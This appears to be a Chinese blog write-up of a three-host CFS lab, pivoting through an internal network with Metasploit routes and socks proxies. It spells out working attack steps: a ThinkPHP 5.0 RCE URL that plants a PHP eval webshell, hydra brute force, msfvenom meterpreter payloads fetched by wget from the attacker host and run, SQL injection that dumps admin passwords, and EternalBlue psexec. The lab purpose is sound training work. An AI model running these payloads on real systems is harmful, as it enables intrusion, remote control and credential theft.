内网渗透之Msf-Socks代理实战（CFS三层靶场渗透过程及思路）

Posted 2023-04-05 不知名白帽

前言

作者简介：不知名白帽，网络安全学习者。

博客主页：https://blog.csdn.net/m0_63127854?type=blog

内网渗透专栏：https://blog.csdn.net/m0_63127854/category_11885934.html

网络安全交流社区：https://bbs.csdn.net/forums/angluoanquan

CFS三层靶场搭建：

内网渗透之CFS三层靶机搭建_不知名白帽的博客-CSDN博客

目录

Socks代理实战-MSF

01渗透场景（网络拓扑）

02测试Target1

02.1信息收集

02.2分析利用（21/22/3306/8888）

02.3分析利用（80）

02.4主机信息收集

02.5建立Socks代理

03测试Target2

03.1开启代理

03.2信息收集

03.3分析利用

03.4主机信息收集

03.5建立隧道

04测试Target3

04.1信息收集

04.2分析利用

---

借鉴文章链接：

CFS三层靶机搭建及其内网渗透_ZredamanJ的博客-CSDN博客_cfs三层

代理技术应用之三层内网漫游 - FreeBuf网络安全行业门户

CFS三层靶机搭建及其内网渗透附靶场环境 - 安全客，安全资讯平台

Socks代理实战-MSF

01渗透场景（网络拓扑）

​

02测试Target1

02.1信息收集

nmap -sS -v -A 192.168.1.128

nmap -A -v -T4 192.168.1.128

​

02.2分析利用（21/22/3306/8888）

21/22端口：弱口令爆破

hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.128 ftp

hydra -vV -l root -P /usr/share/wordlists/metasploit/password.lst 192.168.1.128 ssh

3306端口：不允许远程IP链接

8888端口：宝塔登录页面

02.3分析利用（80）

80端口：Thinkphp v5.0

存在远程命令执行漏洞，通过命令执行写入一句话，可GetShell

/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

​

/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

​

/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd'])?>

​

蚁剑连接

发现两个flag

02.4主机信息收集

ifconfig

发现192.168.22.0/24内网网段

发现192.168.22.129存活主机

02.5建立Socks代理

msfvenom生成payload

查找可用的payload

msfvenom -l payload | grep "linux/x64" | awk "print $l"

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 SessionCommunicationTimeout=0 SessionExpirationTimeout=0 -f elf >6666.elf

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 -f elf >6666.elf

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.130 lport=6666 -f elf >6666.php

上传到target1的tmp目录下

或者开启http服务用wgett来下载

python -m http.server（默认端口为8000）

wget http://192.168.1.130(kali的ip):8000/6666.elf

kali中配置运行监听模块

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set lhost 192.168.1.130

set lport 6666

exploit

chmod 777 6666.elf

./6666.elf

反弹shell

获得target1的meterpreter shell后，添加到192.168.22网段的路由

run autoroute -s 192.168.22.0/24 

run autoroute -p

使用msf的socks5模块建立socks服务，并配置prochains代理

search socks

use auxiliary/server/socks_proxy

set SRVHOST 0.0.0.0

set SRVPORT 1080

exploit

vim /etc/proxychains4.conf

socks5 192.168.1.130 1080

需要加上刚刚配置好的代理文件才能进行扫描

proxychains4 nmap -Pn -sT 192.168.22.128

03测试Target2

03.1开启代理

火狐浏览器插件foxyproxy

配置代理

访问192.168.22.128

03.2信息收集

proxychains4 nmap -Pn -sT 192.168.22.128

03.3分析利用

翻看一下robots.txt

找到后台登录地址，有验证码先不尝试爆破

查看源代码找到提示，存在sql注入

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” --dbs

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms –tables

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin –columns

proxychains4 sqlmap -u “http://192.168.22.128/index.php?r=vul&keyword=1” -p keyword -D bagecms -T bage_admin -C username,password –dump

注意：socks5不稳定，以用sqlmap跑就会断开

手注一下

http://192.168.22.128/index.php?r=vul&keyword=1' union select group_concat(username),group_concat(password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39 from bage_admin-- -

登录后台（admin/123qwe）

发现模板中存在index.php文件，可以写入一句话木马

 

来到标签页，可以看到一句话生效了，接下里在SocksCap64中打开蚁剑，利用蚁剑连接，注意SocksCap设置好代理

03.4主机信息收集

03.5建立隧道

生成正向后门

msfvenom -p linux/x64/meterpreter/bind_tcp LPORT=7777 -f elf > 7777.elf

msf正向连接

use exploit/multi/handler

set payload linux/x64/meterpreter/bind_tcp

set rhost 192.168.22.128

set LPORT 7777

exploit

开启http服务，下载7777.elf文件

提权并运行7777.elf

chomd 777 7777.elf

./7777.elf

反弹shell

添加路由

run autoroute -s 192.168.33.0/24

run autoroute -p

04测试Target3

04.1信息收集

proxychains4 nmap -Pn -sT 192.168.33.33

04.2分析利用

开启445、3389端口，我们可以用永恒之蓝进行攻击

use exploit/windows/smb/ms17_010_psexec

set payload windows/meterpreter/bind_tcp

set RHOST 192.168.33.33

exploit

shell

net user

 

cd /

dir /S /B *flag*

type C:\\Windows\\System32\\config\\flag.txt

# /B 显示文件夹或文件的名字

# /S 显示指定目录和所有子目录中的文件

linux无法识别window汉字会乱码，修改一下代码页（65001代表的是UTF-8）

chcp 65001

找到flag了

CFS三层网络环境靶场实战

一、环境搭建：

①根据作者公开的靶机信息整理

共有三个targets，目标是拿下三台主机权限，且是三层的网络环境，内网网段有192.168.22.0/24和192.168.33.0/24，添加两张仅主机模式网卡，配置如下：

 

 

 

 

②虚拟机网卡设置

target1(centos) 双网卡模拟内外网：

外网：192.168.1.3，桥接模式

内网：192.168.22.128，仅主机模式

 

 

 

target2(ubuntu) 双网卡存在两个内网网段：

内网1：192.168.22.22，仅主机模式

内网2：192.168.33.22，仅主机模式

 

 

 

target3(win7) 单网卡仅内网：

内网：192.168.33.33，仅主机模式

 

 

 

 

开启web服务环境：

宝塔后台登陆地址及密码：

http://靶机外网ip:8888/a768f109/

账号：eaj3yhsl，密码：41bb8fee，根据实际靶机ip，配置即可，我的配置如下：

 

 

 

 

 

二、渗透实战：

0x01 target1：

①信息收集

 

nmap 192.168.1.3 -sV -T4

 

 

 

 

访问80端口，发现是thinkphp5.0

 

 

 

②tp5.0 rce Getshell

index.php?s=/index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

 

 

 

 

直接使用echo写websehll(注意：linux下使用转义$，windows下用^转义)：

http://192.168.1.3/index.php?s=/index/	hinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php eval($_POST[cmd]);?>" >shell.php

 

 

 

 

③MSF上线

我这里使用web_delivery模块一句话上线，因为方便，我懒...

 

 

 

利用蚁剑执行即可上线：

 

 

 

 

 

④横向移动

查看ip信息，发现有两个网卡

 

 

 

 

添加路由、socks代理，进行横向移动

 

 

 

 

添加成功

 

 

 

 

开启socks5代理

 

 

 

 

 

⑤存活主机探测

发现一台ip为192168.22.22的主机，并且开启了80端口，应该是web服务

 

ok，target1就到此结束...

 

0x02 target2：

①信息收集

proxychains nmap 192.168.22.22 -sT -T4 -Pn

 

 

 

 

配置浏览器的socks5代理，访问80端口

 

 

 

 

是一个叫什么八哥CMS搭建的(没听过...)

 

 

 

②目录扫描

proxychains dirb http://192.168.22.22/

扫出一个robots.txt，发现有两个admin的目录

 

发现是一个后台登陆界面，爆破就先不打算(除非万不得已)

 

 

 

 

等待了一会dirb的扫描结果，也没其他重要的目录，就从页面源代码收集一下信息吧，竟然直接给出了注入点...

 

 

 

③注入-->后台登陆

既然给出了注入点，那就直接sqlmap一把梭

proxychains sqlmap -u "http://192.168.22.22/index.php?r=vul&keyword=1" --batch

但是sqlmap一直无法连接url，就像这样....具体啥原因还不清楚...

 

 

 

 

所以就换成了超级sql注入工具(可配置socks代理)

 

 

 

 

获取到admin表的账号密码，解密为：123qwe

 

 

 

 

然后成功登陆后台

 

 

 

④模板Getshell

巡视了一下后台的功能点，发现有熟悉的模板功能，发现可以直接修改文件

 

 

 

修改tag下的index.php文件，插入webshell

 

 

 

蚁剑添加socks代理后连接webshell

 

 

 

 

⑤MSF上线

生成一个bind正向连接的马

msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=6666 -f elf -o test.elf

 

上传到目标服务器

 

 

 

给执行权限，并执行

 

 

 

MSF开启监听，即可收到会话

set payload linux/x86/meterpreter/bind_tcp 
set lport 6666 
set rhost 192.168.22.22 
run

 

 

查看网卡配置，发现又多了一个192.168.33.0/24的网段

 

 

 

⑥添加路由和socks代理

添加多一个socks代理，注意要换一个端口

 

 

 

 

 

 

⑦探测存活主机

发现一台192.168.33.33存活主机

 

 

 

0x03 target3

①信息探测

proxychains nmap -Pn -sT -T4 192.168.33.33

开放了445和3389，无疑是windows了

 

 

②漏洞利用

永恒之蓝肯定要试试的，毕竟emm....舒服嘛hahah，注意payload使用bind直连

使用ms17_010_eternalblue打失败了

 

 

尝试另一个利用模块psexec的，成功拿下target3

 

 

 

三、总结：

总体来说这个靶机还是学到了挺多的，完整地体现了，是如何一步步利用跳板代理横向到最深处网络...

①Thinkphp5.x Rce漏洞利用，echo写马地注意事项

②MSF添加路由和socks代理，将Linux主机作为跳板从而横向移动

③八哥CMS的漏洞利用Getshell，sql注入-->后台管理登陆，后台模板Getshell

④Ms17-010的psexec利用模块的使用

⑤典型的三层网络环境，通过利用MSF强大的路由功能，不断添加路由+socks代理，横向移动到最后一层网络